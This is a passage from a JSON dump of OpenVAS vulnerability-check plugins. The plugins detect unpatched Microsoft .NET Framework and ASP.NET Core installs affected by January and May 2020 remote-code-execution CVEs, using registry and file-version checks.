file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.8 on Microsoft Windows 10 version 1709.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4532935\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.16299\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532935\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532935\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532935\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\")){\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:55", "description": "This host is missing a critical security\n update according to Microsoft KB4532938", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532938)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310815894", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815894", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815894\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532938)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4532938\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5 and 4.8 on Microsoft Windows 10 version 1903 and Microsoft Windows 10 version 1909.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4532938\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.18362\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532938\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9142\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9142\" ;\n break;\n }\n ## https://support.microsoft.com/en-us/help/4532938\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532938\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9142\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9142\" ;\n break;\n }\n ## https://support.microsoft.com/en-us/help/4532938\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532938\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\")){\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:53", "description": "This host is missing a critical security\n update according to Microsoft KB4535102", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535102)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310816552", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816552", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816552\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535102)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4535102\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Microsoft Windows 7 SP1 and Microsoft Windows Server 2008 R2 SP1.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4535102/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n}\n\nkey_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\nforeach key(key_list)\n{\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532945\n ## https://support.microsoft.com/en-us/help/4532929\n ## https://support.microsoft.com/en-us/help/4532932\n ## https://support.microsoft.com/en-us/help/4532941\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532945\n ## https://support.microsoft.com/en-us/help/4532929\n ## https://support.microsoft.com/en-us/help/4532932\n ## https://support.microsoft.com/en-us/help/4532941\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532932\n ## https://support.microsoft.com/en-us/help/4532941\n if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-11T16:46:12", "description": "This host is installed with ASP.NET Core\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-01-16T00:00:00", "type": "openvas", "title": ".NET Core Multiple Vulnerabilities (Jan 2020", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0603", "CVE-2020-0602", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310816556", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816556", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:microsoft:asp.net_core\" ;\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816556\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_cve_id(\"CVE-2020-0602\", \"CVE-2020-0603\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-16 11:32:54 +0530 (Thu, 16 Jan 2020)\");\n script_name(\".NET Core Multiple Vulnerabilities (Jan 2020\");\n\n script_tag(name:\"summary\", value:\"This host is installed with ASP.NET Core\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An error when ASP.NET Core improperly handles web requests.\n\n - An error in ASP.NET Core software when the software fails to handle objects\n in memory.\n\n - Multiple errors in .NET software when the software fails to check the source markup\n of a file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user and conduct DoS attacks.\");\n\n script_tag(name:\"affected\", value:\"ASP.NET Core version 3.0.0, 3.0.1 and 3.1.0\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ASP.NET Core to 3.0.2 or 3.1.1 or later.\n For updates refer the Reference link.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://github.com/dotnet/core/blob/master/release-notes/3.0/3.0.2/3.0.2.md\");\n script_xref(name:\"URL\", value:\"https://github.com/dotnet/core/blob/master/release-notes/3.1/3.1.1/3.1.1.md\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0603\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0602\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n script_dependencies(\"gb_asp_dotnet_core_detect_win.nasl\");\n script_mandatory_keys(\"ASP.NET/Core/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\ncoreVers = infos['version'];\npath = infos['location'];\n\nif (coreVers =~ \"^3\\.0\" && version_is_less(version:coreVers, test_version:\"3.0.2\")){\n fix = \"3.0.2\";\n}\n\nelse if (coreVers =~ \"^3\\.1\" && version_is_less(version:coreVers, test_version:\"3.1.1\")){\n fix = \"3.1.1\" ;\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:coreVers, fixed_version:fix, install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-11T16:46:12", "description": "This host is installed with ASP.NET Core\n SDK and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-01-16T00:00:00", "type": "openvas", "title": ".NET Core SDK Multiple Vulnerabilities (Jan 2020", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0603", "CVE-2020-0602", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310816557", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816557", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:microsoft:.netcore_sdk\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816557\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_cve_id(\"CVE-2020-0602\", \"CVE-2020-0603\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-16 11:32:54 +0530 (Thu, 16 Jan 2020)\");\n script_name(\".NET Core SDK Multiple Vulnerabilities (Jan 2020\");\n\n script_tag(name:\"summary\", value:\"This host is installed with ASP.NET Core\n SDK and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An error when ASP.NET Core improperly handles web requests.\n\n - An error in ASP.NET Core software when the software fails to handle objects\n in memory.\n\n - Multiple errors in .NET software when the software fails to check the source markup\n of a file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user and conduct DoS attacks.\");\n\n script_tag(name:\"affected\", value:\"ASP.NET Core SDK 3.0.x prior to 3.0.102 and 3.1.x\n prior to 3.1.101\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ASP.NET Core to 3.1.101 or 3.0.102 or later.\n For updates refer the Reference link.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://github.com/dotnet/core/blob/master/release-notes/3.0/3.0.2/3.0.2.md\");\n script_xref(name:\"URL\", value:\"https://github.com/dotnet/core/blob/master/release-notes/3.1/3.1.1/3.1.1.md\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0603\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0602\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n script_dependencies(\"gb_asp_dotnet_core_detect_win.nasl\");\n script_mandatory_keys(\".NET/Core/SDK/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\ncoreVers = infos['version'];\npath = infos['location'];\n\nif (coreVers =~ \"^3\\.0\" && version_is_less(version:coreVers, test_version:\"3.0.102\")){\n fix = \"3.0.102\";\n}\n\nelse if (coreVers =~ \"^3\\.1\" && version_is_less(version:coreVers, test_version:\"3.1.101\")){\n fix = \"3.1.101\" ;\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:coreVers, fixed_version:fix, install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T17:44:08", "description": "This host is missing a critical security\n update according to Microsoft KB4552928", "cvss3": {}, "published": "2020-05-13T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple Vulnerabilities (KB4552928)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310817116", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817116", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along 